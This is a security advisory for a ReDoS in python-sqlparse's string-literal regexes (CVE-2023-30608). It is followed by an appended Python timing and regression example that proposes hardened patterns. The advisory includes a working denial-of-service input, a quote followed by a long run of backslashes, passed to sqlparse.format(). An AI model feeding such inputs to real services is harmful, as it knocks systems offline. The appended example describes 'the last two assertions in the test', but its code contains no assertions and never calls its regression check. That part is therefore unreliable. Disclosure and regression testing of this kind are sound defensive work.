Coordinated Disclosure Timeline
- 2023-01-27: Report Sent
- 2023-04-18: Vulnerability patched along with advisory release
Summary
SQLparse has a ReDoS (regular expression denial of service) in the parser for SQL expressions.
Product
python-sqlparse
Tested Version
Details
Issue: ReDoS in keywords.py (GHSL-2023-001)
Both the String.Single and the String.Symbol regular expressions are vulnerable:
SQL_REGEX = [
...
(r"'(''|\\\\|\\'|[^'])*'", tokens.String.Single),
...
(r'"(""|\\\\|\\"|[^"])*"', tokens.String.Symbol),
...
]
This issue was found using the following CodeQL query
Impact
This vulnerability may lead to Denial of Service (DoS).
Proof of Concept
The following code uses the sqlparse.format() function to parse an attacker-controlled string, leading to a denial of service condition:
import sqlparse

# An opening quote followed by a long run of backslashes and no closing quote
attack = "'\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"
res = sqlparse.format(attack)
print(res)
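As an added example, not code from the advisory or from sqlparse, the following Python regression check pins down what goes wrong in the two patterns above and how a maintainer can test for it. The hardened variants are this example's own illustrative change (dropping the `\\\\` alternative, which is redundant with two iterations of `[^']`); the page does not state what the maintainers' patch changed, and the last two assertions in the test show that even this small change alters the token boundary on one constructed edge case, which is why such a change needs differential tests.

```python
import re
import time

# The two patterns quoted in the advisory (String.Single and String.Symbol).
VULN_SINGLE = r"'(''|\\\\|\\'|[^'])*'"
VULN_SYMBOL = r'"(""|\\\\|\\"|[^"])*"'

# Illustrative hardening for this example, not necessarily the maintainers'
# patch: the `\\\\` alternative is redundant, because two backslashes are
# already consumed by two iterations of [^'], and that overlap is what the
# engine explores exponentially on a run of backslashes with no closing
# quote. With it removed, every backslash has exactly one way to be matched.
SAFE_SINGLE = r"'(''|\\'|[^'])*'"
SAFE_SYMBOL = r'"(""|\\"|[^"])*"'


def match_len(pattern: str, text: str):
    """Length of the token re.match() takes at offset 0, or None if no match."""
    m = re.compile(pattern).match(text)
    return None if m is None else m.end()


def unterminated(quote: str, n_backslashes: int) -> str:
    """Constructed worst-case input: opening quote, n backslashes, no closer."""
    return quote + "\\" * n_backslashes


def time_match(pattern: str, text: str) -> float:
    """Seconds spent in a single re.match() call."""
    start = time.perf_counter()
    re.compile(pattern).match(text)
    return time.perf_counter() - start


def safe_rejects_quickly(pattern: str, quote: str, n: int = 50_000) -> bool:
    """Regression check: an unterminated literal of n backslashes must be
    rejected (no match) in well under a second, i.e. in linear time.
    The vulnerable patterns would not finish on this input."""
    text = unterminated(quote, n)
    return match_len(pattern, text) is None and time_match(pattern, text) < 1.0


if __name__ == "__main__":
    # Time grows roughly 2.6x per two extra backslashes for the vulnerable
    # pattern (one path per way of splitting the run into 1s and 2s),
    # and stays flat for the hardened one.
    for n in range(16, 27, 2):
        text = unterminated("'", n)
        print(f"n={n:2d}  vulnerable={time_match(VULN_SINGLE, text):.4f}s"
              f"  hardened={time_match(SAFE_SINGLE, text):.4f}s")
```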
CVE
- CVE-2023-30608
Credit
This issue was discovered by @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2023-001 in any communication regarding this issue.